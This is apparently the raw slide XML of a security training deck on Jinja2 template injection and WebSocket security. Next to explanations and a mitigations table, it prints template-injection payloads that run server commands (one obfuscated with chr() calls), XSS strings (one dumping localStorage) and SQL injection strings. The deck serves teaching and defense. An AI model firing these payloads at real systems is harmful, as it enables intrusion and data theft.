                </a:gridCol>
                <a:gridCol w="1046881">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2415940529"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6842767">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="342611227"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="224609"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Code Segment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1400" b="1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What it does</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1400" b="1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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2429580957"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1406540"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{% import os %}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Statement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It tells the Jinja2 engine to load the Python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os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module into the current template's namespace. This gives the template access to operating system commands. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/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(Note: In a secure/sandboxed environment, this step will fail immediately because imports are blocked.)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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="406513596"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="696352">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/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{{ ... }}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This tells the engine: "Execute whatever is inside these braces and print the result onto the webpage."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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2832351715"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="853599"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os.popen("whoami")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This calls the popen (Process Open) function from the os module. It opens a pipe to the server's command line and runs the command whoami.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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1474809466"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="853599"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.read()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40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popen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returns a file object, not text. The .read() method reads the output of that command (e.g., root or www-data) so it can be displayed as a string.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Nunito Sans"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="44068" marR="44068" marT="29378" marB="29378" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="299977824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B3C2A0-88A6-4176-B500-151666A797A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541866" y="2006701"/>
            <a:ext cx="4777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Nunito Sans"/>
              </a:rPr>
              <a:t>{% import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> %}{{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>os.popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>").read() }}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2722421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F3F2-67B8-4D0B-813E-A3C043AB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59F6-B008-4D14-BCEA-1F7995276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Nunito Sans"/>
              </a:rPr>
              <a:t>{{self.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>builtins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>__.__import__('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>(self.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>builtins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>__.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>(119)%2bself.__init__.__globals__.__builtins__.chr(104)%2bself.__init__.__globals__.__builtins__.chr(111)%2bself.__init__.__globals__.__builtins__.chr(97)%2bself.__init__.__globals__.__builtins__.chr(109)%2bself.__init__.__globals__.__builtins__.chr(105)).read()}}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211061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2792-AFB2-3FA4-56FF-1D59AC9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Introduction to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:latin typeface="Nunito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3F37-98B6-DA0F-1A74-C4622C454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51" y="2235398"/>
            <a:ext cx="9952012" cy="3869374"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> are a technology that allows a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>two-way, real-time conversation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> between a web browser (the client) and a server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Real Life 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967735-D46C-61AA-F5EC-EB6DF8D73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85113"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="870880" y="3131266"/>
          <a:ext cx="9596083" cy="3374738"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3257748">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2648621773"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6338335">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1236458190"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3849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Use Case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How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WebSockets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 Make it Better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077233"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="996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Messaging (WhatsApp/Slack)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When someone types or sends a message, it pops up on your screen instantly without you needing to "refresh" the page.</a:t>
                      </a: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629340"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="996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Live Sports Scores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As soon as a goal is scored, the server "pushes" the updated score to every fan's phone at the exact same millisecond.</a:t>
                      </a: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433016"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="996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Trading &amp; Crypto</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="14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Stock prices change every fraction of a second.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WebSockets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 allow those flickering numbers to update in real-time.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63138" marR="63138" marT="31569" marB="3156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207875"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA6E180-02E8-D737-0E15-76A542E7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9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/ProgrammerHumor - Aren't there any uses for web sockets?">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7A4D296-9CBE-471A-8855-8E95B62D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85" y="2109740"/>
            <a:ext cx="4813132" cy="46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A2B5C3-3801-44DD-B866-C8B51396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4000">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Every Chat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> App </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4000">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>uses WebSockets</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CF82D4-9093-4342-B638-A681D7E9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CB91-E211-2B32-47CD-09BFEE5E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Workflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:latin typeface="Nunito Sans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66773E-39CE-49B8-EA58-46EC6CC7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2103120"/>
            <a:ext cx="4655344" cy="46553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A3498-C99D-7C79-6325-80B0049BC7AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6683693" y="2233136"/>
            <a:ext cx="55083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sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>GET /chat HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  Upgrade: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>websocket</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Nunito Sans" pitchFamily="2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Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  Connection: Upgrade</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  Sec-WebSocket-Key: [base64]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  Sec-WebSocket-Version: 13</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07644A45-DD96-EFAA-1A50-7066E097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73A9-3152-2263-6E3B-DDAC1B2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Identify the WebSocket</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:latin typeface="Nunito Sans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38732-A729-0A87-B26C-59EB1CCF5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46024" b="14584"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="298031" y="2635740"/>
            <a:ext cx="5189220" cy="238809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6CA-A730-047A-F710-CACBABC9B0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362"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5979352" y="2635740"/>
            <a:ext cx="5512854" cy="23880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Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0F94CFC-3371-867C-A0BF-B4B38585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3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78E7-F5E4-B104-6B8F-97746D34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HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>vs WebSockets</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:latin typeface="Nunito Sans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08FAFD-9BA4-5B87-6AEC-0E2B3137F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499593"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="681038" y="2673191"/>
          <a:ext cx="9737285" cy="3182862"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1549894">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3245916207"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4165014">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2590301919"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4022377">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="894635836"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="397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Feature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HTTP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 err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WebSockets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67129"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="69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Direction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One-way (Client asks, Server answers)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Two-way (Both can talk at any time)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748463"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="69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Latency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Higher (Has to "handshake" every time)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Lower (Handshake once, then stays open)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896223"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="69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Best For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Loading articles, images, or REST APIs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Live chats, games, and real-time feeds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361998"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="69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State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Nunito Sans" pitchFamily="2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Stateless (Each request is brand new)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Nunito Sans" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Stateful (The server knows who you are)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433873"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0785363-1E03-AE0F-93F8-5C1A2A8A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88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194B-9552-999A-3E52-4AA4C095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Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:latin typeface="Nunito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66E0-69E6-231C-2637-8AC7A596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Commands for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>websockets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XSS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=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='alert('1')'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>img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=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>='alert(1)'&gt;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=invalid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt;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=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>btoa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JSON.stringify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)))&gt;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SQL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' UNION SELECT username, NULL, NULL, NULL FROM USERS -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' OR 1=1 -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' ORDER BY 4 -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{388AF294-26B3-7AA9-C6FF-0E0B07C3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7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1E56-E78C-19C9-4595-5B832237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Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Mitigations</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:latin typeface="Nunito Sans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B0B4D7-F2D3-8D47-BCCD-0097332C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084456"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="558800" y="2194560"/>
          <a:ext cx="9735381" cy="3989467"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1717040">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4090860410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817124312"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5976181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1628663523"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4651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Attack Type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Where to Fix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Exact Action to Take</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="69209" marR="69209" marT="34604" marB="34604" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1434751283"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="13854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CSWSH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Server (Handshake)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Create an "Allow List" of domains. If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req.headers.origin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 is not in the list, return 403 Forbidden and destroy the socket.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="69209" marR="69209" marT="34604" marB="34604" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3234795857"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="9721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XSS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Client (Browser)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Use .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textContent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 instead of .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innerHTML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 when displaying messages. </a:t>
                      </a:r>
                    </a:p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If HTML is required, use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DOMPurify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.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="69209" marR="69209" marT="34604" marB="34604" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2507095006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1166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SQLi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Server (Database)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="69209" marR="69209" marT="34604" marB="3460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 Sans" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Use Prepared Statements (e.g., $1, ? placeholders) for all database queries triggered by WebSocket messages.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="69209" marR="69209" marT="34604" marB="34604" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3326769780"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7757CFDA-AA90-2D14-1B55-B2751E0D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43" y="615871"/>
            <a:ext cx="1374483" cy="13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3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2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ppt/theme/themeOverride3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11380</TotalTime>
  <Words>2818</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>321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__Inter_d9825c</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Nunito Sans</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>var(--font-suisse-intl)</vt:lpstr>
      <vt:lpstr>Berlin</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
